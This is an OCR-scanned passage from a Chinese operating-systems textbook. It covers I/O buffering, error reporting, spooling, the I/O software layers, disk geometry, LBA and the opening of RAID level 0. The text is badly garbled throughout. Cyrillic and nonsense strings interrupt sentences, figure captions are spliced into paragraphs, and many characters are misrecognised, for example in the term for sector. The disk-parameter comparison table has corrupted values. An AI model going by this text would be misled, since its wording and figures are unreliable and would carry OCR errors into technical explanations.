符 递交 给 用 户 进程 并 且 将 其 解除 阻塞 。 用 户 进程 把 字符 放 到 某 个 地 方 之 后 可 以 对 另 一 个 字符 执行 读 操作 
并 且 再 次 阻塞 。 这 一 模型 如 图 5-15a 所 示 。 


用 户 进程 


用 户 空间 ) 


) 

) 

1) 
D 


内 核 空间 


调制 解 调 器 调制 解 调 器 调制 解 调 器 调制 解 调 器 
а) b) c) а) 
图 5-15 а) 无 缓冲 的 输入 ，b) 用 户 空间 中 的 缓冲 ，c) 内 核 空间 中 的 
缓冲 接着 复制 到 用 户 空间 ，d) 内 核 空间 中 的 双 缓冲 


这 种 处 理 方式 的 问题 在 于 ， 对 于 每 个 到 来 的 字符 ， 都 必须 启动 用 户 进程 。 对 于 短暂 的 数据 流量 让 一 
个 进程 运行 许多 次 效率 会 很 低 ， 所 以 这 不 是 一 个 良好 的 设计 。 

图 5-15b 所 示 为 一 种 改进 措施 。 此 处 ， 用 户 进程 在 用 户 空间 中 提供 了 一 个 包含 个 字符 的 缓冲 区 ， 并 
且 执行 读 人 "个 字符 的 读 操作 。 中 断 服务 过 程 负责 将 到 来 的 字符 放 入 该 缓冲 区 中 直到 缓冲 区 填 满 ， 然后 
唤醒 用 户 进程 。 这 一 方案 比 前 一 种 方案 的 效率 要 高 很 多 ， 但 是 它 也 有 一 个 缺点 ， 当 一 个 字符 到 来 时 ， 如 
果 缓冲 区 被 分 页 而 调 出 了 内 存 会 出 现 什么 问题 呢 ? 解决 方法 是 将 缓冲 区 锁定 在 内 存 中 ， 但 是 如 果 许 多 进 
程 都 在 内 存 中 锁定 页 面 ， 那 么 可 用 页 面 池 就 会 收缩 并 且 系统 性 能 将 下 降 。 

另 一 种 方法 是 在 内 核 室 间 中 创建 一 个 缓冲 区 并 且 让 中 断 处 理 程序 将 字符 放 到 这 个 缓冲 区 中 ， 如 图 
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5-15c 所 示 。 当 该 缓冲 区 被 填 满 的 时 候 ， 将 包含 用 户 缓冲 区 的 页 面 调 入 内 存 (如 果 需 要 的 话 )， 并 且 在 
一 次 操作 中 将 内 核 缓冲 区 的 内 容 复制 到 用 户 缓冲 区 中 。 这 一 方法 的 效率 要 高 很 多 。 

然而 ， 即 使 这 种 方案 也 面临 一 个 问题 : 正当 包含 用 户 缓冲 区 的 页 面 从 磁盘 调 人 内 存 的 时 候 有 新 的 字 
符 到 来 ， 这 样 会 发 生 什么 事情 ? 因为 缓冲 区 已 满 ， 所 以 没有 地 方 放 置 这 些 新 来 的 字符 。 一 种 解决 问题 
的 方法 是 使 用 第 二 个 内 核 缓冲 区 。 第 一 个 缓冲 区 填 满 之 后 ， 在 它 被 清空 之 前 ， 使 用 第 二 个 缓冲 区 ， 如 
图 5-15d 所 示 。 当 第 二 个 缓冲 区 填 满 时 ， 就 可 以 将 它 复制 给 用 户 〈 假 设 用 户 已 经 请 求 它 ) 。 当 第 二 个 缓冲 
区 正在 复制 到 用 户 空间 的 时 候 ， 第 一 个 缓冲 区 可 以 用 来 接收 新 的 字符 。 以 这 样 的 方法 ， 两 个 缓冲 区 轮流 
EA: 当 一 个 缓冲 区 正在 被 复制 到 用 户 空间 的 时 候 ， 另 一 个 缓冲 区 正在 收集 新 的 输入 。 像 这 样 的 缓冲 模 
КК Яа Ж (double buffering), 

广泛 使 用 的 另 一 种 形式 的 缓冲 是 循环 缓冲 区 (circular buffer)。 它 由 一 个 内 存 区 域 和 两 个 指针 组 成 
一 个 指针 指向 下 一 个 空闲 的 字 ， 新 的 数据 可 以 放置 到 此 处 。 另 一 个 指针 指向 缓冲 区 中 数据 的 第 一 个 字 
该 字 尚 未 被 取 走 。 在 许多 情况 下 ， 当 添加 新 的 数据 时 (例如 刚刚 从 网 络 到 来 )， 硬 件 将 推进 第 一 个 指针 ， 
而 操作 系统 在 取 走 并 处 理 数据 时 推进 第 二 个 指针 。 两 个 指针 都 是 环绕 的 ， 当 它们 到 达 顶 部 时 将 回 到 底部 。 

缓冲 对 于 输出 也 是 十 分 重要 的 。 例 如 ， 对 于 没有 缓冲 区 的 调制 解 调 器 ， 我 们 考虑 采用 图 5-15b 的 模 
型 输出 是 如 何 实现 的 。 用 户 进程 执行 write 系统 调用 以 输出 "个 字符 。 系 统 在 此 刻 有 两 种 选择 。 它 可 以 将 
用 户 阻塞 直到 写 完 所 有 字符 ， 但 是 这 样 做 在 低速 的 电话 线 上 可 能 花费 非常 长 的 时 间 。 它 也 可 以 立即 将 用 
户 释放 并 且 在 进行 1O 的 同时 让 用 户 做 某 些 其 他 计算 ， 但 是 这 会 导致 一 个 更 为 精 糕 的 问题 ， 用户 进 程 怎 
样 知道 输出 已 经 完成 并 且 可 以 重用 缓冲 区 ? 系统 可 以 生成 一 个 信号 或 软件 中 断 ， 但 是 这 样 的 编程 方式 是 
十 分 困难 的 并 且 被 证 明 是 竞争 条 件 。 对 于 内 核 来 说 更 好 的 解决 方法 是 将 数据 复制 到 一 个 内 核 缓冲 区 中 
与 图 5-15c 相 类 似 〈 但 是 是 另 一 个 方向 ) ， 并 且 立 刻 将 调用 者 解除 阻塞 。 现 在 实际 的 IO 什么 时 候 完成 都 没 


有 关系 了 ， 用 户 一 旦 被 解除 阻塞 立刻 用 户 进程 
就 可 以 自由 地 重用 缓冲 区 。 Ях 

缓冲 是 一 种 广泛 采用 的 技术 ， 但 zad | © | 
是 它 也 有 不 利 的 方面 。 如 果 数 据 被 组 F 
冲 太 多 次 ， 性 能 就 会 降低 。 例 如 ， 考 a Е 
虚 图 5-16 中 的 网 络 。 其 中 ， 一 个 用 户 。 空间 P 


执行 了 一 个 系统 调用 向 网 络 写 数据 。 a M 

内 核 将 数据 包 复制 到 一 个 内 核 缓 训 区 кыз кын 
中 ， 从 而 立即 使 用 户 进程 得 以 继续 进 Ы 

{т 第 1 步 )。 在 此 刻 ， 用 户 程序 可 以 ксле =. 
重用 缓冲 区 。 

当 驱 动 程序 被 调用 时 ， 它 将 数据 图 5-16 可 能 涉及 多 次 复制 一 个 数据 包 的 网 络 
包 复 制 到 控制 器 上 以 供 输出 〈 第 2 步 )。 它 不 是 将 数据 包 从 内 核 内 存 直接 输出 到 网 线 上 ， 其 原因 是 一 日 开 
始 一 个 数据 包 的 传输 ， 它 就 必须 以 均匀 的 速度 继续 下 去 ， 驱 动 程序 不 能 保证 它 能 够 以 均匀 的 速度 访问 内 
存 ， 因 为 DMA 通 道 与 其 他 MO 设备 可 能 正在 窃取 许多 周期 。 不 能 及 时 获得 一 个 字 将 毁坏 数据 包 ， 而 通过 
在 控制 器 内 部 对 数据 包 进行 缓冲 就 可 以 避免 这 一 问题 。 

当 数 据 包揽 制 到 控制 器 的 内 部 缓冲 区 中 之 后 ， 它 就 会 被 复制 到 网 络 上 (第 3 步 )。 数 据 位 被 发 送 之 后 
立刻 就 会 到 达 接收 器 ， 所 以 在 最 后 一 位 刚刚 送出 之 后 ， 该 位 就 到 达 了 接收 器 ， 在 这 里 数据 包 在 控制 器 中 
被 缓冲 。 接 下 来 ， 数 据 包 复制 到 接收 器 的 内 核 缓 串 区 中 (第 4 步 )。 最 后 ， 它 被 复制 到 接收 进程 的 缓冲 区 
中 (第 5 步 )。 然 后 接收 器 通常 会 发 回 一 个 应 答 。 当 发 送 者 得 到 应 答 时 ， 它 就 可 以 自由 地 发 送 下 一 个 数据 
包 。 然 而 ， 应 该 清楚 的 是 ， 所 有 这 些 复制 操作 都 会 在 很 大 程度 上 降低 传输 速率 ， 因 为 所 有 这 些 步骤 必须 
有 序 地 发 生 。 

3. 错误 报告 

错误 在 VO 上 下 文中 比 在 其 他 上 下 文中 要 常见 得 多 。 当 错误 发 生 时 ， 操 作 系统 必须 尽 最 大 努力 对 它们 进 
行 处 理 。 许 多 错误 是 设备 特定 的 并 且 必 须 由 适当 的 驱动 程序 来 处 理 ， 但 是 错误 处 理 的 框架 是 设备 无 关 的 。 
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一 种 类 型 的 1/O 错 误 是 编程 错误 ， 这 些 错误 发 生 在 一 个 进程 请 求 某 些 不 可 能 的 事情 时 ， 例 如 写 一 个 输 
入 设备 (键盘 、 扫 描 仪 、 鼠 标 等 ) 或 者 读 一 个 输出 设备 (打印 机 、 绘 图 仪 等 )。 其 他 的 错误 包括 提供 了 一 
个 无 效 的 缓冲 区 地 址 或 者 其 他 参数 ， 以 及 指定 了 一 个 无 效 的 设备 〈 例 如 ， 当 系统 只 有 两 块 磁盘 时 指定 了 
磁盘 3) ， 如 此 等 等 。 在 这 些 错误 上 采取 的 行动 是 直截了当 的 : 只 是 将 一 个 错误 代码 报告 返回 给 调用 者 。 

另 一 种 类 型 的 错误 是 实际 的 MO 错误 ， 例 如 ， 试 图 写 一 个 已 经 被 破坏 的 磁盘 块 ， 或 者 试图 读 一 个 已 
经 关机 的 便携 式 摄像 机 。 在 这 些 情形 中 ， 应 该 由 驱动 程序 决定 做 什么 。 如 果 驱 动 程序 不 知道 做 什么 ， 它 
应 该 将 问题 向 上 传递 ， 返 回 给 与 设备 无 关 的 软件 。 

软件 要 做 的 事情 取决 于 环境 和 错误 的 本 质 。 如 果 是 一 个 简单 的 读 错误 并 且 存 在 一 个 交互 式 的 用 户 可 
利用 ， 那 么 它 就 可 以 显示 一 个 对 话 框 来 询问 用 户 做 什么 。 选 项 可 能 包括 重 试 一 定 的 次 数 ， 忽 略 错误 ， 或 
者 杀 死 调用 进程 。 如 果 没 有 用 户 可 利用 ， 惟 一 的 实际 选择 或 许 就 是 以 一 个 错误 代码 让 系统 调用 失败 。 

然而 ， 某 些 错误 不 能 以 这 样 的 方式 来 处 理 。 例 如 ， 关 键 的 数据 结构 (如 根 目录 或 空闲 块 列表 ) 可 能 
已 经 被 破坏 ， 在 这 种 情况 下 ， 系 统 也 许 只 好 显示 一 条 错误 消息 并 且 终 止 。 

4. 分 配 与 释放 专用 设备 

某 些 设备 ， 例 如 CD-ROM 刻 录 机 ， 在 任意 给 定 的 时 刻 只 能 由 一 个 进程 使 用 。 这 就 要 求 操作 系统 对 设 
备 使 用 的 请 求 进行 检查 ， 并 且 根据 被 请 求 的 设备 是 否 可 用 来 接受 或 者 拒绝 这 些 请 求 。 处 理 这 些 请 求 的 一 
种 简单 方法 是 要 求 进程 在 代表 设备 的 特殊 文件 上 直接 执行 open 操 作 。 如 果 设 备 是 不 可 用 的 ， 那 么 open 
就 会 失败 。 于 是 就 关闭 这 样 的 一 个 专用 设备 ， 然 后 将 其 释放 。 

一 种 代替 的 方法 是 对 于 请 求 和 释放 专用 设备 要 有 特殊 的 机 制 。 试 图 得 到 不 可 用 的 设备 可 以 将 调用 者 
阻塞 ， 而 不 是 让 其 失败 。 阻 塞 的 进程 被 放 入 一 个 队列 。 述 早 被 请 求 的 设备 会 变 得 可 用 ， 这 时 就 可 以 让 队 
列 中 的 第 一 个 进程 得 到 该 设备 并 且 继 续 执行 。 

5. 与 设备 无 关 的 块 大 小 

不 同 的 磁盘 可 能 具有 不 同 的 扇 区 大 小 。 应 该 由 与 设备 无 关 的 软件 来 隐藏 这 一 事实 并 且 向 高 层 提 供 一 
个 统一 的 块 大 小 ， 例 如 ， 将 车 干 个 扁 区 当 作 一 个 逻辑 块 。 这 样 ， 高 层 软件 就 只 需 处 理 抽象 的 设备 ， 这 些 
抽象 设备 全 都 使 用 相同 的 体 辑 块 大 小 ， 与 物理 扁 区 的 大 小 无 关 。 类 似 地 ， 某 些 字符 设备 (如 调制 解 调 器 ) 
一 次 一 个 字 节 地 交付 它们 的 数据 ， 而 其 他 的 设备 〈 如 网 络 接口 ) 则 以 较 大 的 单位 交付 它们 的 数据 。 这 些 
差异 也 可 以 被 隐藏 起 来 。 


5.3.4 用 户 空间 的 VO 软 件 

尽管 大 部 分 IO 软件 都 在 操作 系统 内 部 ， 但 是 仍然 有 一 小 部 分 在 用 户 空间 ， 包 括 与 用 户 程序 连接 在 
一 起 的 库 ， 甚 至 完全 运行 于 内 核 之 外 的 程序 。 系 统 调用 (包括 MO 系统 调用 ) 通常 由 库 过 程 实现 。 当 一 
个 C 程 序 包含 调用 

count=write(fd, buffer, nbytes); 
时 ， 库 过 程 write 将 与 该 程序 连接 在 一 起 ， 并 包含 在 运行 时 出 现在 内 存 中 的 二 进 制程 序 中 。 所 有 这 些 库 过 
程 的 集合 显然 是 VO 系统 的 组 成 部 分 。 

Щщ 过 程 所 做 的 工作 不 过 是 将 这 些 参数 放 在 合适 的 位 置 供 系统 调用 使 用 ， 但 是 确 有 其 他 LO 过 
程 实 际 实现 真正 的 操作 。 输 入 和 输出 的 格式 化 是 由 库 过 程 完成 的 。 一 个 例子 是 C 语 言 中 的 printf， 它 以 一 
个 格式 串 和 可 能 的 一 些 变量 作为 输入 ， 构 造 一 个 ASCII 字 符 串 ， 然 后 调用 write 以 输出 这 个 串 。 作 为 printf 
的 一 个 例子 ， 考 虑 语句 

printf("The square of %3d is %6dì\n", i, 1"1); 
该 语句 格式 化 一 个 字符 种， 该 字符 串 是 这 样 组 成 的 : 先是 14 个 字符 的 串 “The square of ”( 注 意 of 后 有 
一 个 空格 ) ， 随 后 是 ; 值 作为 3 个 字符 的 串 ， 然 后 是 4 个 字符 的 串 “is” (注意 前 后 各 有 一 个 空格 ) ， 然 后 是 忆 
值 作为 6 个 字符 的 种， 最 后 是 一 个 换行 。 

对 输入 而 言 ， 类 似 过 程 的 一 个 例子 是 scanf， 它 读 取 输 入 并 将 其 存放 到 一 些 变量 中 ， 采 用 与 printf 同 
样 语法 的 格式 串 来 描述 这 些 变量 。 标 准 的 IO 库 包含 许多 涉及 IO 的 过 程 ， 它 们 都 是 作为 用 户 程序 的 一 部 
分 运行 的 。 
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并 非 所 有 的 用 户 层 1/O 软 件 都 是 由 库 过 程 组 成 的 。 另 一 个 重要 的 类 别 是 假 脱 机 系统 。 假 脱 机 
(spooling) 是 多 道 程序 设计 系统 中 处 理 独占 1/0 设 备 的 一 种 方法 。 考 虚 一 种 典型 的 假 脱 机 设备 ， 打 印 机 。 
尽管 在 技术 上 可 以 十 分 容易 地 让 任何 用 户 进程 打开 表示 该 打印 机 的 字符 特殊 文件 ， 但 是 假如 一 个 进程 打 
开 它 ， 然 后 很 长 时 间 不 使 用 ， 则 其 他 进程 都 无 法 打印 。 

另 一 种 方法 是 创建 一 个 特殊 进程 ， 称 为 宁 护 进程 (daemon)， 以 及 一 个 特殊 目录 ， 称 为 假 脱 机 目录 
(spooling directory)。 一 个 进程 要 打印 一 个 文件 时 ， 首 先生 成 要 打印 的 整个 文件 ， 并 且 将 其 放 在 假 脱 机 
目录 下 。 由 守护 进程 打印 该 目录 下 的 文件 ， 该 进程 是 允许 使 用 打印 机 特殊 文件 的 惟一 进程 。 通 过 保护 特 
殊 文件 来 防止 用 户 直接 使 用 ， 可 以 解决 某 些 进程 不 必要 地 长 期 空 占 打印 机 的 问题 。 

假 脱 机 不 仅仅 用 于 打印 机 ， 还 可 以 在 其 他 情况 下 使 用 。 例 如 ， 通 过 网 络 传输 文件 常常 使 用 一 个 网 络 
守护 进程 。 要 发 送 一 个 文件 到 某 个 地 方 ， 用 户 可 以 将 该 文件 放 在 一 个 网 络 假 脱 机 目录 下 。 稍 后 ， 由 网 络 
守护 进程 将 其 取出 并 且 发 送出 去 。 这 种 假 脱 机 文件 传输 方式 的 一 个 特定 用 途 是 USENET 新 闻 系统 ， 该 网 
络 由 世界 上 使 用 因特网 进行 通信 的 成 千 上 


万 台 计算 机 组 成 ， 针 对 许多 话题 存在 着 几 层次 vog rae. 
千 个 新 闻 组 。 要 发 送 一 条 新 闻 消 息 ， 用 户 Yo 产生 W/O 请求， 对 1/O 进 行 格 
可 以 调用 新 闻 程序 ， 该 程序 接收 要 发 出 的 请 未 式 化 ， 假 脱 机 


命名 、 保 护 、 分 块 ， 缓 冲 、 
分 配 


设置 设备 寄存 器 ， 检 查 状态 


消息 ， 然 后 将 其 存放 在 假 脱 机 目录 中 ， 待 
以 后 发 送 到 其 他 计算 机 上 。 整 个 新 闻 系统 
是 在 操作 系统 之 外 运行 的 。 

图 5-17 对 MO 系统 进行 了 总 结 ， 给 出 
了 所 有 层次 以 及 每 一 层 的 主要 功能 。 从 底 


部 开始 ， 这 些 层 是 硬件 、 中 断 处 理 程序、 
设备 驱动 程序 、 与 设备 无 关 的 软件 ， 最 后 


是 用 户 进程 。 图 5-17 IO 系统 的 层次 以 及 每 一 层 的 主要 功能 

图 5-17 中 的 箭头 表明 了 控制 流 。 例如 
当 一 个 用 户 程序 试图 从 一 个 文件 中 读 一 个 块 时 ， 操 作 系统 被 调用 以 实现 这 一 请 求 。 与 设备 无 关 的 软件 在 
缓冲 区 高 速 缓存 中 查找 有 无 要 读 的 块 。 如 果 需 要 的 块 不 在 其 中 ， 则 调用 设备 驱动 程序 ， 向 硬件 发 出 一 个 
请 求 ， 让 它 从 磁盘 中 获取 该 块 。 然 后 ， 进 程 被 阻塞 直到 磁盘 操作 完成 。 

当 磁盘 操作 完成 时 ， 硬 件 产 生 一 个 中 断 。 中 上 断 处 理 程序 就 会 运行 ， 它 要 查 明 发 生 了 什么 事情 ， 也 就 
是 说 此 刻 需要 关注 哪个 设备 。 然 后 ， 中 断 处 理 程序 从 设备 提取 状态 信息 ， 唤 醒 休眠 的 进程 以 结束 此 次 
VO 请 求 ， 并 且 让 用 户 进程 继续 运行 。 


5.4 盘 


现在 我 们 开始 研究 某 些 实际 的 1/O 设 备 。 我 们 将 从 盘 开 始 ， 盘 的 概念 简单 ， 但 是 非常 重要 。 然 后 ， 
我 们 将 研究 时 钟 、 键 盘 和 显示 器 。 


5.4.1 盘 的 硬件 

盘 具 有 多 种 多 样 的 类 型 。 最 为 常用 的 是 磁盘 (硬盘 和 软盘 )， 它们 具有 读 写 速度 同样 快 的 特点 ， 这 
使 得 它们 成 为 理想 的 辅助 存储 器 (用 于 分 页 、 文 件 系统 等 ) 。 这 些 盘 的 阵列 有 时 用 来 提供 高 可 靠 性 的 存 
储 器 。 对 于 程序 、 数 据 和 电影 的 发 行 而 言 ， 各 种 光盘 (CD-ROM、 可 刻录 CD 以 及 DVD) 也 非常 重要 。 
在 下 面 各 小 节 中 ， 我 们 首先 描述 这 些 设备 的 硬件 ， 然 后 描述 其 软件 。 

1. 磁盘 

磁盘 被 组 织 成 柱 面 ， 每 一 个 柱 面包 含 若干 磁道 ， 磁道 数 与 垂直 堆 又 的 磁头 个 数 相同 。 磁 道 又 被 分 成 
若干 扁 区 ， 软 盘 上 大 约 每 条 磁道 有 8 ~ 32 个 扇 区 ， 硬盘 上 每 条 磁道 上 扁 区 的 数目 可 以 多 达 几 百 个 。 磁 头 
数 大 约 是 1~ 16 个 。 

老式 的 磁盘 只 有 少量 的 电子 设备 ， 它 们 只 是 传送 简单 的 串 行 位 流 。 在 这 些 磁盘 上 ， 控制 器 做 了 大 部 
分 的 工作 。 在 其 他 磁盘 上 ， 特 别 是 在 IDE (Integrated Drive Electronics， 集 成 驱动 电子 设备 ) 和 SATA 


与 设备 无 关 的 软件 


设备 驱动 程序 


当 1/O 完 成 时 唤醒 驱动 程序 


执行 WO 操作 


202 #5% 


(Serial АТА, Ф ТАТА) 盘 上 ， 磁 盘 驱动 器 本 身 包含 一 个 微 控 制 器 ， 该 微 控制 器 承担 了 大 量 的 工作 并 且 
友 许 实际 的 控制 器 发 出 一 组 高 级 命令 。 控 制 器 经 常 做 磁道 高 速 缓存 、 坏 块 重 映射 以 及 更 多 的 工作 。 

对 磁盘 驱动 程序 有 重要 意义 的 一 个 设备 特性 是 : 控制 器 是 否 可 以 同时 控制 两 个 或 多 个 驱动 器 进行 寻 
道 ， 这 就 是 重合 手 道 (overlapped seek)。 当 控制 器 和 软件 等 待 一 个 驱动 器 完成 寻 道 时 ， 控 制 器 可 以 同时 
启动 另 一 个 驱动 器 进行 寻 道 。 许 多 控制 器 也 可 以 在 一 个 驱动 器 上 进行 读 写 操作 ， 与 此 同时 再 对 另 一 个 或 
多 个 其 他 驱动 器 进行 寻 道 ， 但 是 软盘 控制 器 不 能 在 两 个 驱动 器 上 同时 进行 读 写 操作 。( 读 写 数据 要 求 控 
制 器 在 微 秒 级 时 间 尺 度 传输 数据 ， 所 以 一 次 传输 就 用 完了 控制 器 大 部 分 的 计算 能 力 。) 对 于 具有 集成 控 
制 器 的 硬盘 而 言情 况 就 不 同 了 ， 在 具有 一 个 以 上 这 种 硬盘 驱动 器 的 系统 上 ， 它 们 能 够 同时 操作 ， 至 少 在 
磁盘 与 控制 器 的 缓冲 存储 器 之 间 进 行 数据 传输 的 限度 之 内 是 这 样 。 然 而 ， 在 控制 器 与 主 存 之 间 可 能 同时 
只 有 一 次 传输 。 同 时 执行 两 个 或 多 个 操作 的 能 力 极 大 地 降低 了 平均 存 取 时 间 。 

图 5-18 比 较 了 最 初 的 IBM PC 标准 存储 介质 的 参数 与 20 年 后 制造 的 磁盘 的 参数 ， 从 中 可 以 看 出 过 去 
20 年 磁盘 发 生 了 多 大 的 变化 。 有 趣 的 是 ， 可 以 注意 到 并 不 是 所 有 的 参数 都 具有 同样 程度 的 改进 。 平 均 寻 
道 时 间 改进 了 7 倍 ， 传 输 率 改进 了 1300 倍 ， 而 容量 的 改进 则 高 达 50 000 倍 。 这 一 格局 主要 是 因为 磁盘 中 
运动 部 件 的 改进 相对 和 缓 浙 进 ， 而 记录 表面 则 达到 了 相当 高 的 位 密度 。 


参数 1ВМ 360KB 软 盘 WD 18300 硬 盘 
柱 面 数 = 40 _ 10 601 
每 柱 面 磁道 数 2 12 

| SEREN 9 281 (平均 ) 
СТТ 720 T: 35 742 000 
每 扁 区 字 节 数 512 上 三 

| 磁盘 容量 360KB 183GB 

| 寻 道 时 间 ( 相 邻 柱 面 ) Gms Og8ms | 
寻 道 时 间 (平均 情况 | Vms T б9т | 
旋转 时 间 200ms 8.33ms 
电动 机 停止 /启动 时 间 250ms 20ms 
传输 1 个 扇 区 的 时 间 Dm | 1 


015-18 最 初 的 BM PC 360KB 软 盘 参数 与 西部 数据 公司 WD 18300 硬 盘 参数 


在 阅读 现代 硬盘 的 说 明 书 时 ， 要 清楚 的 事情 是 标 称 的 几何 规格 以 及 驱动 程序 软件 使 用 的 几何 规格 与 
物理 格式 几乎 总 是 不 同 的 。 在 老式 的 磁盘 上 ， 每 栈道 扇 区 数 对 所 有 柱 面 都 是 相同 的 。 而 现代 磁盘 则 被 划 
分 成 环 带 ， 外 层 的 环 带 比 内 层 的 环 带 拥有 更 多 的 扇 区 。 图 5-19a 所 示 为 一 个 微小 的 磁盘 ， 它 具有 两 个 环 
带 ， 外 层 的 环 带 每 磁道 有 32 个 遍 区 ， 内 层 的 环 带 每 磁道 有 16 个 扇 区 。 一 个 实际 的 磁盘 (例如 WD 18300) 
常常 有 16 个 环 带 ， 从 最 内 层 的 环 带 到 最 外 层 的 环 带 ， 每 个 环 带 的 扇 区 数 增加 大 约 4% 。 


图 5-19 а) 具有 两 个 环 带 的 磁盘 的 物理 几何 规格 ，b) 该 磁盘 的 一 种 可 能 的 虚拟 几何 规格 
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为 了 隐藏 每 个 磁道 有 多 少 扇 区 的 细节 ， 大 多 数 现代 磁盘 都 有 一 个 虚拟 几何 规格 呈现 给 操作 系统 。 软 
件 在 工作 时 仿佛 存在 着 x 个 柱 面 、y 个 磁头 、 每 磁道 z 个 遍 区 ， 而 控制 器 则 将 对 (x, y, с) 的 请 求 重 映射 到 实 
际 的 柱 面 、 磁 头 和 扇 区 。 对 于 图 5-19a 中 的 物理 磁盘 ， 一 种 可 能 的 虚拟 几何 规格 如 图 5-19b 所 示 。 在 两 种 
情形 中 磁盘 拥有 的 扁 区 数 都 是 192， 只 不 过 公布 的 排列 与 实际 的 排列 是 不 同 的 。 

对 于 PC 机 而 言 ， 上 述 三 个 参数 的 最 大 值 常常 是 (65 535，16，63)， 这 是 因为 需要 与 最 初 JBM PC 的 
限制 向 后 兼容 。 在 IBM PC 机 器 上 ， 使 用 16 位 、4 位 和 6 位 的 字段 来 设 定 这 些 参数 ， 其 中 柱 面 和 遍 区 从 1 开 
始 编号 ， 磁 头 从 0 开始 编号 。 根 据 这 些 参数 以 及 每 个 扇 区 512 字 节 可 知 ， 磁 盘 最 大 可 能 的 容量 是 31.5GB 。 
为 突破 这 一 限制 ， 所 有 现代 磁盘 现在 都 支持 一 种 称 为 还 辑 块 手 址 (logical block addressing, LBA) 的 系 
统 ， 在 这 样 的 系统 中 ， 磁 盘 扇 区 从 0 开始 连续 编号 ， 而 不 管 磁盘 的 几何 规格 如 何 。 

2.RAID 

在 过 去 十 多 年 里 ，CPU 的 性 能 一 直 呈 现 出 指数 增长 ， 大 体 上 每 18 个 月 翻 一 番 。 但 是 磁盘 的 性 能 就 不 
是 这 样 了 。20 世 纪 70 年 代 ， 小 型 计算 机 磁盘 的 平均 寻 道 时 间 是 50 ~ 10028), 现在 的 寻 道 时 间 略 微 低 于 
10 毫 秒 。 在 大 多 数 技术 产业 (如 汽车 业 或 航空 业 ) H, 在 20 年 之 内 有 5 一 10 倍 的 性 能 改进 就 将 是 重大 的 
新 闻 (想象 300 МРС Ө), ， 但 是 在 计算 机 产业 中 ， 这 却 是 一 个 窘境 。 因 此 ， CPU 性 能 与 磁盘 性 能 
之 间 的 差距 随 着 时 间 的 推移 将 越 来 越 大 。 

正如 我 们 已 经 看 到 的 ， 为 了 提高 CPU 的 性 能 ， 越 来 越 多 地 使 用 了 并 行 处 理 。 在 过 去 许多 年 ,很 多 人 
也 意识 到 并 行 1O 是 一 个 很 好 的 思想 。Patterson 等 人 在 他 们 1988 年 写 的 文章 中 提出 ， 使 用 六 种 特殊 的 磁盘 
组 织 可 能 会 改进 磁盘 的 性 能 、 可 靠 性 或 者 同时 改进 这 两 者 (Patterson 等 人 ，1988)。 这 些 思想 很 快 被 工业 
界 所 采纳 ， 并 且 导 致 称 为 RAID 的 一 种 新 型 LO 设备 的 诞生 。Patterson 等 人 将 RAID 定 义 为 Redundant Array 
of Inexpensive Disk (Aft Ж. ФЕЯ), ， 但 是 工业 界 将 I{ 重 定义 为 Independent (独立 ) 而 不 是 Inexpensive 
(廉价 )， 或 许 这 样 他 们 就 可 以 收取 更 多 的 费用 ? 因为 反面 角色 也 是 需要 的 (如同 RISC 对 CISC， 这 也 是 源 
于 Patterson) ， 此 处 的 “ 坏 家 伙 ” 是 SLED (Single Large Expensive Disk， 单 个 大 容量 兄 责 磁盘 ) 。 

RAID 背 后 的 基本 思想 是 将 一 个 装 满 了 磁盘 的 盒子 安装 到 计算 机 (通常 是 一 个 大 型 服务 器 ) 上 ， 用 
RAID 控 制 器 赫 换 磁 盘 控 制 器 卡 ， 将 数据 复制 到 整个 RAID 上， 然后 继续 常规 的 操作 。 换 言 之 ， 对 操作 系 
统 而 言 一 个 RAID 应 该 看 起 来 就 像 是 一 个 LED， 但 是 具有 更 好 的 性 能 和 更 好 的 可 靠 性 。 由 于 SCSI 盘 具有 
良好 的 性 能 、 较 低 的 价格 并 且 在 单个 控制 器 上 能 够 容纳 多 达 7 个 驱动 器 (对 宽 型 SCSI 而 言 是 15 个 ) ， 很 自 
然 地 大 多 数 RAID 由 一 个 RAID SCSI 控 制 器 加 上 一 个 装 满 了 SCSI 盘 的 盒子 组 成 ， 而 对 操作 系统 而 言 这 似 
平 就 是 一 个 大 容量 磁盘 。 以 这 样 的 方法 ， 不 需要 软件 做 任何 修改 就 可 以 使 用 RAID ， 对 于 许多 系统 管理 
员 来 说 这 可 是 一 大 卖点 。 

除了 对 软件 而 言 看 起 来 就 像 是 一 个 磁盘 以 外 ， 所 有 的 RAID 都 具有 同样 的 特性 ， 那 就 是 将 数据 分 布 
在 全 部 驱动 器 上 ， 这 样 就 可 以 并 行 操作 。 Patterson 等 人 为 这 样 的 操作 定义 了 几 种 不 同 的 模式 ， 它 们 现在 
被 称 为 0 级 RAID 到 5 级 RAID。 此 外 ， 还 有 少许 其 他 的 辅助 层级 ， 我 们 就 不 讨论 了 。 “层级 ”这 一 术语 多 
少 有 一 些 用 词 不 当 ， 因 为 此 处 不 存在 分 层 结构 ， 它们 只 是 可 能 的 六 种 不 同 组 织 形式 而 已 。 

0 级 RAID 如 图 5-20a 所 示 。 它 将 RAID 模 拟 的 虚拟 单个 磁盘 划分 成 条 带 ， 每 个 条 带 具有 k 个 扁 区 ， 其 
中 扇 区 0~k-1 为 条 带 0， 扁 区 k~2k~1 为 条 带 1， 以 此 类 推 。 如果 k = 1， 则 每 个 条 带 是 一 个 扁 区 ， 如 果 k = 
2， 则 每 个 条 带 是 两 个 扁 区 ， 以 此 类 推 。0 级 RAID 结 构 将 连续 的 条 带 以 轮转 方式 写 到 全 部 驱动 器 上 ， 图 
5-20a 所 示 为 具有 四 个 磁盘 驱动 器 的 情形 。 

像 这 样 将 数据 分 布 在 多 个 驱动 器 上 称 为 划分 条 带 (striping)。 例 如 ， 如 果 软 件 发 出 一 条 命令 ， 读 取 
一 个 由 四 个 连续 条 带 组 成 的 数据 块 ， 并 且 数 据 块 起 始 于 条 带 边界 ， 那么 RAID 控 制 器 就 会 将 该 命令 分 解 
为 四 条 单独 的 命令 ， 每 条 命令 对 应 四 块 磁盘 中 的 一 块 ， 并 且 让 它们 并 行 操作 。 这 样 我 们 就 运用 了 并 行 
LO 而 软件 并 不 知道 这 一 切 。 

0 级 RAID 对 于 大 数据 量 的 请 求 工作 性 能 最 好 ， 数 据 量 越 大 性 能 就 越 好 。 如 果 请 求 的 数据 量 大 于 驱动 
器 数 乘 以 条 带 大 小 ， 那 么 某 些 驱动 器 将 得 到 多 个 请 求 ， 这 样 当 它们 完成 了 第 一 个 请 求 之 后 ， 就 会 开始 处 


